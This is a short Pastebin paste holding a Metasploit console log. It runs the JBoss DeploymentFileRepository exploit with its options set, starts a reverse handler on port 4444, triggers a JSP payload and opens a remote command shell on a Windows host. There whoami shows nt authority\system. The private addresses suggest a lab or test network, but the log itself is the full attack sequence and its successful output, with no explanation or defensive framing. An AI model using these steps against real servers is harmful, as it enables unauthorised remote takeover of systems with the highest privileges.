Guest User

Untitled

a guest
Feb 19th, 2018
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. msf exploit(jboss_deploymentfilerepository) > set RPORT 9363
  2. RPORT => 9363
  3. msf exploit(jboss_deploymentfilerepository) > set VERB HEAD
  4. VERB => HEAD
  5. msf exploit(jboss_deploymentfilerepository) > set SSL TRUE
  6. SSL => TRUE
  7. msf exploit(jboss_deploymentfilerepository) > set SHELL cmd.exe
  8. SHELL => cmd.exe
  9. msf exploit(jboss_deploymentfilerepository) > exploit
  10.  
  11. [*] Started reverse handler on 172.16.5.1:4444
  12. [*] Triggering payload at '/mWWQ5CF1T2no/CmTVlgu5w.jsp'...
  13. [-] Execution failed on '/mWWQ5CF1T2no/CmTVlgu5w.jsp' [No Response], retrying...
  14. [*] Command shell session 5 opened (172.16.5.1:4444 -> 172.16.5.132:1058) at Wed Mar 09 09:00:12 -0700 2011
  15. [-] Exploit exception: Interrupt
  16.  
  17.  
  18.  
  19. C:\Program Files\PostgresPlus\8.4AS\mgmtsvr\bin>whoami
  20. whoami
  21. nt authority\system
  22.  
  23. C:\Program Files\PostgresPlus\8.4AS\mgmtsvr\bin>
Add Comment
Please, Sign In to add comment